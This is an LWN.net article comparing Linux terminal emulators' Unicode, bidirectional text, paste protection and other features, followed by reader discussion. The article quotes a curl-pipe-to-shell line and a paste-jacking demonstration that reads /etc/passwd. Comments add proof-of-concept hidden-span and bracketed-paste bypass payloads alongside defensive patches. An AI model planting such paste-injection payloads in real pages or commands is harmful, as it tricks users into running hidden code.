LWN.net News from the source
| Please consider subscribing to LWN Subscriptions are the lifeblood of LWN.net. If you appreciate this content and would like to see more of it, your subscription will help to ensure that LWN continues to thrive. Please visit this page to join up and keep LWN on the net. |
Terminals have a special place in computing history, surviving along with the command line in the face of the rising ubiquity of graphical interfaces. Terminal emulators have replaced hardware terminals, which themselves were upgrades from punched cards and toggle-switch inputs. Modern distributions now ship with a surprising variety of terminal emulators. While some people may be happy with the default terminal provided by their desktop environment, others take great pride at using exotic software for running their favorite shell or text editor. But as we'll see in this two-part series, not all terminals are created equal: they vary wildly in terms of functionality, size, and performance.
Some terminals have surprising security vulnerabilities and most have wildly different feature sets, from support for a tabbed interface to scripting. While we have covered terminal emulators in the distant past, this article provides a refresh to help readers determine which terminal they should be running in 2018. This first article compares features, while the second part evaluates performance.
Here are the terminals examined in the series:
Terminal Debian Fedora Upstream Notes Alacritty N/A N/A 6debc4f no releases, Git head GNOME Terminal 3.22.2 3.26.2 3.28.0 uses GTK3, VTE Konsole 16.12.0 17.12.2 17.12.3 uses KDE libraries mlterm 3.5.0 3.7.0 3.8.5 uses VTE, "Multi-lingual terminal" pterm 0.67 0.70 0.70 PuTTY without ssh, uses GTK2 st 0.6 0.7 0.8.1 "simple terminal" Terminator 1.90+bzr-1705 1.91 1.91 uses GTK3, VTE urxvt 9.22 9.22 9.22 main rxvt fork, also known as rxvt-unicode Xfce Terminal 0.8.3 0.8.7 0.8.7.2 uses GTK3, VTE xterm 327 330 331 the original X terminal
Those versions may be behind the latest upstream releases, as I restricted myself to stable software that managed to make it into Debian 9 (stretch) or Fedora 27. One exception to this rule is the Alacritty project, which is a poster child for GPU-accelerated terminals written in a fancy new language (Rust, in this case). I excluded web-based terminals (including those using Electron) because preliminary tests showed rather poor performance.
The first feature I considered is Unicode support. The first test was to display a string that was based on a string from the Wikipedia Unicode page: "é, Δ, Й, ק ,م, ๗,あ,叶, 葉, and 말". This tests whether a terminal can correctly display scripts from all over the world reliably. xterm fails to display the Arabic Mem character in its default configuration:
By default, xterm uses the classic "fixed" font which, according to Wikipedia has "substantial Unicode coverage since 1997". Something is happening here that makes the character display as a box: only by bumping the font size to "Huge" (20 points) is the character finally displayed correctly, and then other characters fail to display correctly:
Those screenshots were generated on Fedora 27 as it gave better results than Debian 9, where some older versions of the terminals (mlterm, namely) would fail to properly fallback across fonts. Thankfully, this seems to have been fixed in later versions.
Now notice the order of the string displayed by xterm: it turns out that Mem and the following character, the Semitic Qoph, are both part of right-to-left (RTL) scripts, so technically, they should be rendered right to left when displayed. Web browsers like Firefox 57 handle this correctly in the above string. A simpler test is the word "Sarah" in Hebrew (שרה). The Wikipedia page about bi-directional text explains that:
Many computer programs fail to display bi-directional text correctly. For example, the Hebrew name Sarah (שרה) is spelled: sin (ש) (which appears rightmost), then resh (ר), and finally heh (ה) (which should appear leftmost).
Many terminals fail this test: Alacritty, VTE-derivatives (GNOME Terminal, Terminator, and XFCE Terminal), urxvt, st, and xterm all show Sarah's name backwards—as if we would display it as "Haras" in English.
The other challenge with bi-directional text is how to align it, especially mixed RTL and left-to-right (LTR) text. RTL scripts should start from the right side of the terminal, but what should happen in a terminal where the prompt is in English, on the left? Most terminals do not make special provisions and align all of the text on the left, including Konsole, which otherwise displays Sarah's name in the right order. Here, pterm and mlterm seem to be sticking to the standard a little more closely and align the test string on the right.
The next critical feature I have identified is paste protection. While it is widely known that incantations like:
![[xterm failure]](https://static.lwn.net/images/2018/terms-unicode-xterm.png "xterm failure")
![[xterm failure, huge fonts]](https://static.lwn.net/images/2018/terms-unicode-xterm2.png "xterm failure, huge fonts")
![[GNOME Terminal Hebrew]](https://static.lwn.net/images/2018/terms-unicode-gnome.png "GNOME Terminal Hebrew")
![[mlterm Hebrew]](https://static.lwn.net/images/2018/terms-unicode-mlterm.png "mlterm Hebrew")
$ curl http://example.com/ | sh
are arbitrary code execution vectors, a less well-known vulnerability
is that hidden commands can sneak into copy-pasted text from a web
browser, even after careful review. Jann Horn's test site
brilliantly shows how the apparently innocuous command:
git clone git://git.kernel.org/pub/scm/utils/kup/kup.git
gets turned into this nasty mess (reformatted a bit for easier reading) when pasted from Horn's site into a terminal:
git clone /dev/null;
clear;
echo -n "Hello ";
whoami|tr -d '\n';
echo -e '!\nThat was a bad idea. Don'"'"'t copy code from websites you don'"'"'t trust! \
Here'"'"'s the first line of your /etc/passwd: ';
head -n1 /etc/passwd
git clone git://git.kernel.org/pub/scm/utils/kup/kup.git
This works by hiding the evil code in a <span> block that's moved out of the viewport using CSS.
Bracketed paste mode is explicitly designed to neutralize this
attack. In this mode, terminals wrap pasted text in a pair of special
escape sequences to inform the shell of that text's origin. The shell can
then ignore special editing characters found in the pasted text.
Terminals going all the way
back to the venerable xterm have supported this feature, but bracketed
paste also needs support from the shell or application running on the
terminal. For example, software using GNU Readline (e.g. Bash)
needs the following in the ~/.inputrc file:
set enable-bracketed-paste on
Unfortunately, Horn's test page also shows how to bypass this
protection, by including the end-of-pasted-text sequence in the pasted text
itself, thus ending the bracketed mode prematurely. This works because some
terminals do not properly filter
escape sequences before adding their own. For example, in my tests,
Konsole fails to properly escape the second test, even
with .inputrc properly configured. That means it is easy to
end
up with a broken configuration, either due to an unsupported application
or misconfigured shell. This is particularly likely when logged on to
remote servers where carefully crafted configuration files may be
less common, especially if you operate many different machines.
A good solution to this problem is the confirm-paste plugin
of the
urxvt terminal, which simply prompts before
allowing any paste with a
newline character. I haven't found another terminal with such
definitive protection against the attack described by Horn.
A popular feature is support for a tabbed interface, which we'll define broadly as a single terminal window holding multiple terminals. This feature varies across terminals: while traditional terminals like xterm do not support tabs at all, more modern implementations like Xfce Terminal, GNOME Terminal, and Konsole all have tab support. Urxvt also features tab support through a plugin. But in terms of tab support, Terminator takes the prize: not only does it support tabs, but it can also tile terminals in arbitrary patterns (as seen at the right).
Another feature of Terminator is the capability to "group" those tabs together and to send the same keystrokes to a set of terminals all at once, which provides a crude way to do mass operations on multiple servers simultaneously. A similar feature is also implemented in Konsole. Third-party software like Cluster SSH, xlax, or tmux must be used to have this functionality in other terminals.
Tabs work especially well with the notion of "profiles": for example, you may have one tab for your email, another for chat, and so on. This is well supported by Konsole and GNOME Terminal; both allow each tab to automatically start a profile. Terminator, on the other hand, supports profiles, but I could not find a way to have specific tabs automatically start a given program. Other terminals do not have the concept of "profiles" at all.
The last feature I considered is the terminal's look and feel. For example, GNOME, Xfce, and urxvt support transparency, background colors, and background images. Terminator also supports transparency, but recently dropped support for background images, which made some people switch away to another tiling terminal, Tilix. I am personally happy with only a Xresources file setting a basic color set (Solarized) for urxvt. Such non-standard color themes can create problems however. Solarized, for example, breaks with color-using applications such as htop and IPTraf.
While the original VT100 terminal did not support colors, newer terminals usually did, but were often limited to a 256-color palette. For power users styling their terminals, shell prompts, or status bars in more elaborate ways, this can be a frustrating limitation. A Gist keeps track of which terminals have "true color" support. My tests also confirm that st, Alacritty, and the VTE-derived terminals I tested have excellent true color support. Other terminals, however, do not fare so well and actually fail to display even 256 colors. You can see below the difference between true color support in GNOME Terminal, st, and xterm, which still does a decent job at approximating the colors using its 256-color palette. Urxvt not only fails the test but even shows blinking characters instead of colors.
Some terminals also parse the text for URL patterns to make them
clickable. This is the case for all VTE-derived terminals, while urxvt
requires the matcher plugin to visit URLs through a mouse click or
keyboard shortcut. Other terminals reviewed do not display URLs in any
special way.
Finally, a new trend treats scrollback buffers as an optional
feature. For example, st has no scrollback buffer at all,
pointing
people toward terminal multiplexers like tmux and GNU
Screen in its FAQ. Alacritty also lacks scrollback buffers
but will add support soon because there was "so much pushback on
the scrollback support". Apart from those outliers, every terminal I
could find supports scrollback buffers.
In the next article, we'll compare performance characteristics like memory usage, speed, and latency of the terminals. But we can already see that some terminals have serious drawbacks. For example, users dealing with RTL scripts on a regular basis may be interested in mlterm and pterm, as they seem to have better support for those scripts. Konsole gets away with a good score here as well. Users who do not normally work with RTL scripts will also be happy with the other terminal choices.
In terms of paste protection, urxvt stands alone above the rest with its special feature, which I find particularly convenient. Those looking for all the bells and whistles will probably head toward terminals like Konsole. Finally, it should be noted that the VTE library provides an excellent basis for terminals to provide true color support, URL detection, and so on. So at first glance, the default terminal provided by your favorite desktop environment might just fit the bill, but we'll reserve judgment until our look at performance in the next article.
meta: how to reproduce those results, and the terms that were not picked
Posted Mar 30, 2018 18:40 UTC (Fri) by anarcat (subscriber, #66354) [Link]
https://gitlab.com/anarcat/terms-benchmarks
... with a (potentially out of date) mirror on GitHub here:
https://github.com/anarcat/terms-benchmarks
Only the results for the first part of the series is public so far: a second part for benchmarks will be published along with the second part.
That repository also lists other terminal emulators and why they were not included in the review. Apologies in advance for the maintainers of all those other projects, no harm was intended, but there are so many of you that I had to make a choice at some point. :)
A look at terminal emulators, part 1
Posted Mar 30, 2018 19:25 UTC (Fri) by jg (subscriber, #17537) [Link]
Compliance to the ANSI standard is another axis on which terminal emulators should be judged. Doing it right is
important for application compatibility.
I don't know if the later generations of terminal emulators share that lineage (probably the only part of xterm I'd want to preserve if I was ever crazy enough to again deal with a terminal emulator; the history of xterm slightly *predates*
the X Window System itself).
- Jim
about compatibility
Posted Mar 30, 2018 20:04 UTC (Fri) by anarcat (subscriber, #66354) [Link]
Hi Jim!Compatibility is one of the features that I looked at but that ultimately didn't make it to the final version published here, because it's a really complex subject with many pitfalls. I do touch a bit on that in the Unicode and paste protection sections, but basically: it is hard topic.
The xterm FAQ makes a good review of how many control sequences are supported by various terminals, and it seems, according to the author, that xterm is way ahead of all the other terminals in that game. That certainly relates to my experience in the field as well: I often had to operate equipment using a serial console adapter, and particularly HP Procurve switches which have an "interesting" menu system. Turns out this would break down completely in anything but Xterm. In general, I have a reflex of "go back to xterm" whenever something weird happens on the terminal...
But it's tricky: the xterm maintainer also happens to be the ncurses maintainer right now, so things that are "supposed to work" are really "supposed to work in xterm". Considering that xterm's history and complexity, it's hard for other terminals to emulate correctly everything that xterm does. The fact is that xterm has become a de-facto standard on its own: anyone writing a terminal emulator now basically needs to have that as a target... Targeting ANSI, or VT100, VT102, VT202 or whatever else at this point does not make sense: there are many things that terminals do now (e.g. bracketed paste or even simply colors) that those "standards" never made any mention of. Inversely, there are many things in those standards that are not necessary in modern terminals either (e.g. printer control sequences...) Besides, I don't know if emulating only "ANSI" would bring you very far...
A whole article could be written about this, really. I'm still considering it: running `vttest` on many terminals, trying to figure out what's going on, parse the results, etc. But really, my brain still hurts from writing this piece, so it will be a while before I dare plunging into this again. ;)
As for lineage: from what I understand, only a few of the terminals reviewed here share any real ancestry with xterm. There's a whole family of xterm derivatives, but most were ultimately excluded from the review here because their are inactive upstream. As far as I know, Konsole, VTE and all the others are basically rewrites, but definitely not "cleanroom". A lot of escape sequences and logic are often copied verbatim from the Xterm source code (if not ncurses), so there is *some* heritage there at least...
about compatibility
Posted Mar 30, 2018 20:30 UTC (Fri) by jg (subscriber, #17537) [Link]
In practice, the VT100/102/220/240 line were mostly faithful to the ANSI standard and very widespread in practice as
DEC terminals were very common (and not just on DEC systems); if you nail them, then you've covered just about anything software out there, as they had to be supported back in the day. And emulating them exactly was more
important than the ANSI standard itself.
The xterm secret sauce was the parser itself, which actually did parsing properly according to the standard. Thereafter it is mostly a matter of simple code and implementation. But it was hard to get the parsing right: I had to deal with that before the mentioned code donation from people in DEC (that I also worked for at the time), who were experts at
it. Life was much easier once someone else solved that problem for me (or lifted the code; as I said, I'm not convinced they should have given the code to me). It is also very possible/likely they may have reimplemented the parser rather than given me DEC copyright code: but they were true experts at terminals who did so, and may not have been properly authorized by management. We got much more careful about contributions as time went on, and DEC is long past history....
I know the actual code base used in DEC terminals was different though; that I am sure (it was on some tiny microprocessor in the terminals, and unlikely in C at all).
In the early X era, having a solid terminal emulator that really "just worked" for almost any application was one
of X's important features. And I'm oh so happy to not be the xterm maintainer (which I was for a few years early
in X...) My immense thanks to those who are....
about compatibility
Posted Apr 1, 2018 22:12 UTC (Sun) by auerswal (subscriber, #119876) [Link]
A look at terminal emulators, part 1
Posted Mar 30, 2018 20:19 UTC (Fri) by tbodt (subscriber, #120821) [Link]
A look at terminal emulators, part 1
Posted Apr 15, 2018 13:29 UTC (Sun) by rbanffy (subscriber, #103898) [Link]
A look at terminal emulators, part 1
Posted Mar 30, 2018 21:01 UTC (Fri) by eternaleye (subscriber, #67051) [Link]
> “ISO 2022 locking escape sequences oh flying spaghetti monster please kill me now.” — actual USENIX peer review from the Mosh paper.
A look at terminal emulators, part 1
Posted Mar 30, 2018 20:17 UTC (Fri) by jwilk (subscriber, #63328) [Link]
A look at terminal emulators, part 1
Posted Mar 31, 2018 1:41 UTC (Sat) by anarcat (subscriber, #66354) [Link]
This would certainly be worth reporting upstream. In fact, ideally, I would have done with the other articles I wrote here and reported this issue in *all* the terminals, but really, that means a *lot* of (possibly controversial) bug reports... :)
A look at terminal emulators, part 1
Posted Mar 31, 2018 7:26 UTC (Sat) by jwilk (subscriber, #63328) [Link]
<html>$ echo Hello <span style="position: absolute; left: -100px; top: -100px">| cowsay pwned</span> world</html>(Tested with Firefox 52.7.3 + urxvt 9.22 + bash 4.4.18)
A look at terminal emulators, part 1
Posted Mar 31, 2018 15:48 UTC (Sat) by anarcat (subscriber, #66354) [Link]
https://paste.anarc.at/control-o-hack.html
Here copy-pasting this with the middle mouse button doesn't execute any code in urxvt: the ^O shows up on screen, but doesn't seem to cause the code to execute, nor does it cause the confirm-paste plugin to fire.
A look at terminal emulators, part 1
Posted Mar 31, 2018 21:48 UTC (Sat) by jwilk (subscriber, #63328) [Link]
Do you have bracket paste enabled in inputrc? My exploit doesn't defeat it, although it could. It's a matter of adding [201~ before .
A look at terminal emulators, part 1
Posted Mar 31, 2018 22:20 UTC (Sat) by anarcat (subscriber, #66354) [Link]
https://paste.anarc.at/control-o-hack.html
i had to tweak it a little because the leading dollar sign would get parsed by bash and confuse things a little (although cowsay would still be called)
so, i guess this should be reported against urxvt as well eh...
A look at terminal emulators, part 1
Posted Mar 31, 2018 23:22 UTC (Sat) by domo (subscriber, #14031) [Link]
A look at terminal emulators, part 1
Posted Mar 31, 2018 23:42 UTC (Sat) by domo (subscriber, #14031) [Link]
added $str =~ tr/\033//d; to my confirm-paste copy and this particular exploit is not effective anymore...
A look at terminal emulators, part 1
Posted Mar 31, 2018 23:54 UTC (Sat) by domo (subscriber, #14031) [Link]
--- Downloads/confirm-paste.txt 2018-04-01 02:49:34.886913091 +0300
+++ dotdir/urxvt/chomp-and-confirm-paste 2018-04-01 02:40:11.030578963 +0300
@@ -21,9 +21,14 @@
sub on_tt_paste {
my ($self, $str) = @_;
+ chomp $str; $str =~ tr/\033//d;
+
my $count = ($str =~ tr/\012\015//);
- return unless $count;
+ unless ($count) {
+ $self->tt_paste ($str);
+ return 1;
+ }
$self->{paste} = \$str;
$self->msg ("Paste of $count lines, continue? (y/n)");
A look at terminal emulators, part 1
Posted Apr 2, 2018 8:41 UTC (Mon) by jwilk (subscriber, #63328) [Link]
Enumerating badness usually doesn't end well. There are other control sequences that could be used for code execution (^[^E and ^X^E at least). Proof of concept exploits:![[Terminator tiling]](https://static.lwn.net/images/2018/terms-terminator-sm.png "Terminator tiling")
![[True color]](https://static.lwn.net/images/2018/terms-true-colors.png "True color")
$({ echo; cowsay pwned; }>&2)[201~
[201~Dicowsay pwnedZZ
A look at terminal emulators, part 1
Posted Apr 3, 2018 14:12 UTC (Tue) by anarcat (subscriber, #66354) [Link]
A look at terminal emulators, part 1
Posted Apr 3, 2018 21:30 UTC (Tue) by domo (subscriber, #14031) [Link]
my $count = ($str =~ tr/[\0-\010\012-\037]//);
i.e. all ascii codes below 32 except tab, to trigger confirm-paste.
A look at terminal emulators, part 1
Posted Apr 4, 2018 13:39 UTC (Wed) by mgedmin (subscriber, #34497) [Link]
A look at terminal emulators, part 1
Posted Apr 5, 2018 6:56 UTC (Thu) by pabs (subscriber, #43278) [Link]
Personally I tend to paste into a GUI text editor before pasting into the terminal.
I sometimes wonder if anyone did any fuzzing of paste routines in those editors.
A look at terminal emulators, part 1
Posted Apr 12, 2018 12:24 UTC (Thu) by okapi (guest, #111261) [Link]
If bash inteprets a Ctrl-O, even with enable-bracketed-paste then that's a readline bug. More likely, your configuration is wrong somehow. In my testing, I get a literal ^O in the line.
A look at terminal emulators, part 1
Posted Apr 22, 2018 8:06 UTC (Sun) by jwilk (subscriber, #63328) [Link]
Bracked paste bypass was reported in 2015: https://bugs.debian.org/787628
Apparently upstream is not interested in fixing it.
A look at terminal emulators, part 1
Posted Mar 31, 2018 9:14 UTC (Sat) by tpo (subscriber, #25713) [Link]
A look at terminal emulators, part 1
Posted Apr 1, 2018 18:17 UTC (Sun) by xtifr (subscriber, #143) [Link]
Not a universal solution, I realize, but should provide a good stopgap, if you're personally worried about this.
A look at terminal emulators, part 1
Posted Apr 2, 2018 7:01 UTC (Mon) by tpo (subscriber, #25713) [Link]
bind -r "^O"
You need to enter the "^O" there as CTRL-v CTRL-o.
A look at terminal emulators, part 1
Posted Apr 2, 2018 7:38 UTC (Mon) by xtifr (subscriber, #143) [Link]
It's a little confusing that it doesn't use the same syntax as .inputrc, but such is life...
You can also say "bind -u operate-and-get-next" to remove the binding of that function from *all* keys.
Though honestly, now that I look at it, it's a handy command I wish I'd known about before, and I may end up binding it to some other key, despite it's (relatively mild) danger.
Other related discussions and possible CVEs
Posted Apr 9, 2018 21:27 UTC (Mon) by anarcat (subscriber, #66354) [Link]
As it turns out, this specific issue was discussed elsewhere before. A friend pointed me towards this discussion. As it turns out, the conclusion was basically "meh, we know":This is posted here every few months. Frankly, there's a lackluster care in fixing this in these terminals. For terminals, here's a decent avenue (gnome-terminal as example): https://turbochaos.blogspot.com/2014/08/journalctl-terminal-escape-injection.htmlThat latter thread is even more disturbing, in a way...
A look at terminal emulators, part 1
Posted Mar 30, 2018 21:51 UTC (Fri) by nix (subscriber, #2304) [Link]
A look at terminal emulators, part 1
Posted Mar 30, 2018 22:11 UTC (Fri) by karkhaz (subscriber, #99844) [Link]
One thing:
> For example, st has no scrollback buffer at all, pointing people toward terminal multiplexers like tmux and GNU Screen in its FAQ
There exist patches [0] to st to add scrollback, and many other features---pretty much anything that isn't core functionality in st must be patched in. While this may seem excessive, st's philosophy is not to have any runtime configuration files or other input, everything must be compiled in to config.h. That includes colour schemes, etc. It's thus not generally useful to install a distro-provided binary of st; better to get the source package, patch it yourself, and build that using the tools that your distro provides to build source packages.
st, compiling from source and latency
Posted Mar 31, 2018 1:31 UTC (Sat) by anarcat (subscriber, #66354) [Link]
And yes, compiling all of those from source would be better, but considering there are 10 different programs listed here, tested on two different operating systems, it was considered too time-consuming to go that far in the tests.
As for performance, you might like to know that latency is one of the core criteria i will look into, so stay tuned! :)
st, compiling from source and latency
Posted Mar 31, 2018 17:02 UTC (Sat) by ballombe (subscriber, #9523) [Link]
Not really. It is more useful to test the software users actually run.
Very few bother to build their terminal emulator from source.
A look at terminal emulators, part 1
Posted Mar 31, 2018 5:32 UTC (Sat) by shiar (subscriber, #67206) [Link]
There's a good practical test at danluu.com. Would love to see something like that for these common Linux options.
Also looking forward to memory usage, though it may be hard to compare different features. For example number of colours, amount of contents and scrollback, multiple tabs and/or instances (see Konsole advantage or urxvtdaemonisation), etc.
What?!? No Putty?
Posted Mar 30, 2018 22:53 UTC (Fri) by Cyberax (✭ supporter ✭, #52523) [Link]
What?!? No Putty?
Posted Mar 30, 2018 23:58 UTC (Fri) by cjwatson (subscriber, #7322) [Link]
pterm and GTK+
Posted Mar 31, 2018 0:08 UTC (Sat) by cjwatson (subscriber, #7322) [Link]
pterm and GTK+
Posted Mar 31, 2018 0:15 UTC (Sat) by cjwatson (subscriber, #7322) [Link]
Oh, and some improvements to bracketed paste handling recently landed in PuTTY upstream, although I haven't had a chance to try them out myself yet.
pterm and GTK+
Posted Mar 31, 2018 1:32 UTC (Sat) by anarcat (subscriber, #66354) [Link]
A look at terminal emulators, part 1
Posted Mar 31, 2018 5:06 UTC (Sat) by gutschke (subscriber, #27910) [Link]
Testing Right-To-Left text is interesting though, as I am not even sure there is an unambiguously sane way that terminals can interpret changing directions. What is supposed to happen, if I explicitly set the cursor position adjacent to existing mixed-direction text? Should the existing text in this cursor position influence how new text is formatted? Or should that only happen if I output a sequence of characters without intervening escape codes? How about when I change the terminal from overwrite into insert mode? Does that change behavior? How does cursor positioning work when it encounters mixed text? Is the answer different for relative and absolute cursor positioning commands?
While it is certainly possible to come up with *an* answer to these question, I doubt it is the only answer. I'd expect that each implementation does something different, resulting in behavior that is so hard to predict that no application could rely on anything but the most basic set of features. But who knows, maybe there is a standard for this and I just don't know about it.
All of this gets even more complex for languages like Arabic that require ligatures (or shaping) to make the text intelligble. You can no longer think of a word as being made up of distinct characters, but you have to look at most or all of the word to figure out how to render it. I have a really hard time seeing how terminal emulators can provide a sane implementation with these constraints. It pretty much breaks all assumptions about a fixed grid of characters, and about the ability to arbitrarily position the cursor to any X/Y coordinate. Y coordinates still make sense (until we consider vertically-rendered text), but X coordinates are getting increasingly fuzzy.
I'd love to hear if there is a universally agreed upon convention how to handle this problem, and whether there are any terminal emulators that correctly implement all the corner cases.
A look at terminal emulators, part 1
Posted Mar 31, 2018 9:40 UTC (Sat) by dottedmag (subscriber, #18590) [Link]
A look at terminal emulators, part 1: more on bidi and such
Posted Apr 2, 2018 4:08 UTC (Mon) by tzafrir (subscriber, #11501) [Link]
Though some south-east Asian scripts are indeed more complex and break that assumption of one character per space.
I think this was not mentioned in the review, but Konsole's bidi support is optional (It's an option you have to tick somewhere deep in the menus). Indeed there's one common use case where bidi is annoying: if you use an Israeli locale, the day of the week and the month name are Hebrew, and thus the output of ls has some Hebrew in it. Some terminals would make a mess of it aligning some file names to the right and some file names to the left.
Generally in my experience mlterm works relatively well for editing Hebrew. Konsole: less so.
A look at terminal emulators, part 1: more on bidi and such
Posted Apr 10, 2018 13:24 UTC (Tue) by pjm (guest, #2080) [Link]
While rendering rtl text left to right does make that text very slow to read, it does at least have the advantage that it's clear what the logical order is (avoiding the ls problem referred to above), so I would often prefer the ltr approach when using a terminal. However, I'll grant that this is only viable because I don't use an rtl locale for LC_MESSAGES.
(I wonder, is there any value in the Mongolian solution, i.e. rotating the text so that everything is written top-to-bottom instead of either ltr or rtl ? 90°-rotated text is still a bit slower to read than unrotated text, but much quicker than reading ltr isolated-form letters for arabic script.)
Unicode support
Posted Mar 31, 2018 5:07 UTC (Sat) by shiar (subscriber, #67206) [Link]
A more elaborate Unicode sampler will show various different difficiencies in all emulators. Character display mostly depends on font coverage, but emulators will often fail to align them properly, or break on selection or scrolling.
Unicode support
Posted Mar 31, 2018 16:21 UTC (Sat) by anarcat (subscriber, #66354) [Link]
From what I can tell, gnome-terminal (and vte derivatives) displays the test pretty well, but fails to align RTL paragraphs to the right, as I have found in my tests.
However, it seems that urxvt doesn't find some scripts: the tibetan declaration of rights shows up as boxes. In xterm, they show up as blanks.
Alignment is great in rxvt, xterm, gnome-term, but Konsole somewhat fails in the math formulas, just like my web browser (FF 59). Strangely, most terminals fail the first "compact font overview" except Konsole.. Alacritty also has alignment issues and significant latency in loading the file.
pterm seems impeccable all around, and i suspect mlterm would also do the right thing, but i only have the older 3.5 Debian version on hand...
So yeah, I guess that, again, pterm/mlterm would win at displaying unicode here as well, and the test shows some flaws in urxvt/xterm rendering that my simpler tests did not clearly show (although I did find issues with xterm).
Termite
Posted Mar 31, 2018 7:01 UTC (Sat) by joschi03 (guest, #123388) [Link]
Termite
Posted Mar 31, 2018 9:33 UTC (Sat) by grawity (subscriber, #80596) [Link]
Termite's backend is a slightly-outdated fork of VTE 3, most results would be the same as GNOME Terminal and the rest.
A look at terminal emulators, part 1
Posted Mar 31, 2018 9:51 UTC (Sat) by grawity (subscriber, #80596) [Link]
Some terminals also parse the text for URL patterns to make them clickable. This is the case for all VTE-derived terminals
VTE also has an interesting feature in which the application itself can mark specific text as a clickable link, which is supported by ls --hyperlink.
Enlightenment's Terminology has similar ad-hoc features using its own tools (tyls, tycat) and is oddly absent from the review completely. It would have been interesting to know where it ranks in terms of Unicode support. Its developers have refused to add a true-color mode, though.
A look at terminal emulators, part 1
Posted Apr 4, 2018 13:20 UTC (Wed) by borisfaure (guest, #123474) [Link]
Terminology does not support RTL scripts, but there's a bug open about it: https://phab.enlightenment.org/T5380 .
It does support Unicode but not combining characters (https://phab.enlightenment.org/T560). The test in the article should render correctly though.
I have not refused to add a true-color mode.
It won't support it fully but it does approximate those TrueColors to a palette of 256 colors. It should do it better than XTerm since it is not using a dumb euclidean distance to compute color distance but something a bit more complex: the last formula on the Euclidean chapter on Color Distance on Wikipedia ( https://en.wikipedia.org/wiki/Color_difference#Euclidean ).
I know it's not perfect but having true-color support would imply too much work on EFL and I'm not confident on doing that soon. As usual, I'll be happy to review patches!
I'd also be interested in benchmarks. On the ones I used, Terminology was a clear winner few years ago.
A look at terminal emulators, part 1
Posted Apr 17, 2018 20:18 UTC (Tue) by Ross (subscriber, #4065) [Link]
But that's an interesting point about color distances.
XTerm doesn't just use Euclidian distance. It's kind of messy. See allocateClosestRGB() for allocations and searchColors() for finding matches.
xtermClosestColor() does work as you suggest when matching colors on a paletted display (or if not compiled with DirectColor support). find_color_register() for graphics uses weighted Euclidian distance, and it doesn't seem to take advantage of DirectColor (that's my fault).
I'd immediately replace all of these, but there are two problems with the CIEDE2000 formula:
* it most likely assumes linear response per channel -- this is usually not true with raw RGB
correcting for this is either a lookup table per channel (but it is hard to know which values to
plug in) or it isn't clear how to adapt the formula
* the formula would be very slow as they would require colorspace conversion in addition
to lots of multiplications, divisions, and square root operations in the computation itself
The last formula in the Euclidian section which you mention looks reasonable, but the first issue
probably still applies. How do you handle that? How much better is it than the weighted Euclidian
distance? It would be nice to have a way to measure match quality to test various approximations.
terminal paste protection : why not at browser level?
Posted Mar 31, 2018 10:42 UTC (Sat) by Herve5 (subscriber, #115399) [Link]
terminal paste protection : why not at browser level?
Posted Mar 31, 2018 11:07 UTC (Sat) by karkhaz (subscriber, #99844) [Link]
Something like: if the user copies some text that contains control characters or other nasties, the window manager could throw up some kind of alert window telling them so. It would be nice to have the range of troublesome characters configurable, too---for example, Hebrew or Arabic-speaking users might commonly be copying U+200F RIGHT-TO-LEFT MARK, but other users might want to be warned about it.
I'm not sure how widely welcomed this would be, though. For users who never run a terminal emulator, this feature seems mostly useless.
terminal paste protection : why not at browser level? -> potential addon
Posted Mar 31, 2018 17:18 UTC (Sat) by Herve5 (subscriber, #115399) [Link]
terminal paste protection : why not at browser level?
Posted Apr 1, 2018 23:13 UTC (Sun) by roc (subscriber, #30627) [Link]
For example, is text inside "font-size:1px" displayed? How about text inside "opacity:0.05"? How about "background:black; color:rgb(5,5,5)"? How about homoglyphs? What about using relative positioning, line-height, letter-spacing etc to overprint or reorder text?
The most foolproof way might be to determine the copied text by performing OCR on the pixel data ... except of course there are interesting ways to fool OCR too.
terminal paste protection : why not at browser level?
Posted Apr 2, 2018 18:46 UTC (Mon) by iabervon (subscriber, #722) [Link]
terminal paste protection : why not at browser level?
Posted Apr 3, 2018 18:45 UTC (Tue) by Herve5 (subscriber, #115399) [Link]
Linux console
Posted Mar 31, 2018 11:00 UTC (Sat) by ballombe (subscriber, #9523) [Link]
Linux console
Posted Mar 31, 2018 18:40 UTC (Sat) by patrick_g (subscriber, #44470) [Link]
> The Linux console itself wasn't directly tested, as it was too difficult to instrument performance tests, which would have been mostly meaningless, except for the bandwidth tests, which is the least important.
Lilyterm has paste protection also
Posted Mar 31, 2018 12:43 UTC (Sat) by aragilar (subscriber, #122569) [Link]
Regarding performance
Posted Mar 31, 2018 20:07 UTC (Sat) by Hector (guest, #123399) [Link]
Something to keep in mind when measuring performance: My urxvt became 10x faster after switching fromURxvt*font : xft:somethingto
URxvt*font : -xos4-terminus-medium-*-normal-*-12-*-*-*-*-*-iso10646-*.
Regarding performance
Posted Mar 31, 2018 21:47 UTC (Sat) by rohieb (subscriber, #115261) [Link]
A look at terminal emulators, part 1
Posted Mar 31, 2018 21:29 UTC (Sat) by moltonel (subscriber, #45207) [Link]
A more obscure but very useful feature is zmodem up/download (typically using lzrz on the remote machine). It's often more practical tha scp, especially if you're multiple ssh hops away from the remote machine.
As for tiling, Konsole supports a limited version of it (tile layout must be all-vertical or all-horizontal).
A look at terminal emulators, part 1
Posted Apr 1, 2018 2:53 UTC (Sun) by flussence (subscriber, #85566) [Link]
I'm using st now which is obstinate in its own way: several keys produce a control sequence that isn't used by the rest of the world just because it's technically, pedantically correct in a letter-of-the-law sense. This usually means the delete key doesn't work anywhere. It's a QoL improvement despite that, but I've never found a terminal I'm completely happy with.
DomTerm and other web-based terminals
Posted Apr 2, 2018 1:16 UTC (Mon) by Per_Bothner (subscriber, #7375) [Link]
DomTerm can be one of the dreaded Electron apps (though there is also a Qt version or you can use your desktop browser). Regardless, DomTerm is not going to be as memory-efficient (nor as zippy) as traditional terminal emulator - but you gain quite a bit in terms of both eye-candy and functionality. In terms of eye candy you use CSS to change many aspects of the appearance.In terms of functionality, having a more structured data representation (as opposed to a plain character grid) opens up a lot of possibilities: smart text-wrap (including pretty-printing); "folding" (show/hide buttons); smart copying; being able to save, analyze, and post-process the transcript (for example with delimited input and output). And of course: the output can include graphics, images, and rich (html) text. An application can annotate the output with comments, hovers, images, links, which can be styled, and those annotations persist when you copy or save the output.
There are other web-based terminal emulators (some of which use Electron) that are basically character grids without DomTerm's extra structure and features - and for those I agree it's harder to justify the extra memory use.
Some DomTerm-specific notes:
The GitHub page lists Domterm under "too big or too hard to install". The DomTerm 1.0 release includes rpms for Fedora.
(Use the qtdomterm package for the Qt version.)
The "magicstring" test works.
"cat sarah" displayed correctly, but not right-aligned.
